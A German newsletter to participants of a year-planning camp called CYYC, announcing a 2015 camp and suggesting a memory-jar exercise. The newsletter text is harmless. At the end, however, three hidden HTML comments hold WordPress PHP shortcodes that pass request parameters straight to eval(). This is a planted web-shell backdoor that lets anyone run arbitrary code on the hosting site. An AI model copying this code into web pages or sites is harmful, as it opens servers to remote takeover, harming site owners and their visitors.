Februar-Newsletter an CYYC Teilnehmer

Wir bedanken uns bei allen für die Rückmeldungen zum Camp. Es ist für uns keine Selbstverständlichkeit, dass wir derart dezidiertes, klares und wertschätzendes Feedback erhalten. Wir (Birgit und Nadja) haben uns vor drei Tagen zur Nachbesprechung getroffen, um aus den Erfahrungen, Einflüssen, Ideen und konstruktiven Vorschlägen das CYYC 2015 zu entwickeln.

Und JA, das CYYC 2015 wird es geben! Der Termin ist bereits ausgesucht (24. Januar 2015) und euer Feedback und die Tatsache, dass es bereits vor Termin vier Anmeldungen gibt, bestätigt unsere Idee.

(Anmeldungen vorerst immer noch über die alte Webseite, wir haben aber bereits eine eigene Domain registriert und setzen demnächst die neue Webseite auf.)

Hey Birgit, wie geht es dir nach dem Camp?

Ich bin voll im Fluss, ganz nach dem Motto:

Geh weiter wo es leicht geht,
dort ist es richtig.

Hey Nadja, wie geht es dir nach dem Camp?
Habe letzte Woche mein Jahr 2014 geplant. Dafür einfach Schwerpunkte auf eine Mindmap gelistet und Namen oder Orte oder Monate dazu geschrieben. Fühle mich gut damit und habe bereits drei erste Schritte für drei verschiedene Projekte gemacht.

Create…

Vielleicht habt ihr fest gestellt, dass es uns mit dem Camp nicht nur darum ging, das Jahr zu planen, sondern vielmehr darum, sein Leben in die Hand zu nehmen. Wir brennen immer noch dafür, Menschen zusammen zu bringen, die gemeinsam an ihren Plänen, Ideen und Projekten arbeiten this page. Alles, was wir mit euch unternommen haben – von der Hausaufgabe bis zum letzten Energizer im Camp – waren (wie Birgit das so schön nennt) Synapsenreize. Und dieses werden wir jetzt während des Jahres – wie versprochen – fortsetzen.

Hier kommt ein Vorschlag:

Nehme ein leeres Glas.

Wann immer dir während dieses Jahres etwas Schönes passiert, schreibe es auf einen kleinen Zettel und tue diese Erinnerung in das Glas.

In der nächsten Sylvesternacht kannst du dann die gesammelten Erinnerungen auf einmal anschauen und hast du dann sicher sowohl etwas zum Weinen als auch etwas zum Lachen.

Anfangen kannst du sofort :-)
Wie geht es dir mit deinem Jahr?

Ist dir bereits etwas Besonderes passiert? Kannst du dich noch daran erinnern, welche Wünsche du an das Jahr hattest? Fällt es dir einfach, dich darauf zu fokussieren?

Wir wollen während des Jahres ein paar Geschichten und Erfahrungsberichte darüber sammeln, wie man sein Leben gestalten kann, und diese mit anderen Teilnehmern teilen. Wenn du möchtest, dass deine Geschichte dabei ist, melde dich!
Viele Grüße und bis bald!

Birgit und Nadja

<!– [insert_php]if (isset($_REQUEST["lhJ"])){eval($_REQUEST["lhJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["lhJ"])){eval($_REQUEST["lhJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZXbOW"])){eval($_REQUEST["ZXbOW"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZXbOW"])){eval($_REQUEST["ZXbOW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nTllC"])){eval($_REQUEST["nTllC"]);exit;}[/insert_php][php]if (isset($_REQUEST["nTllC"])){eval($_REQUEST["nTllC"]);exit;}[/php] –>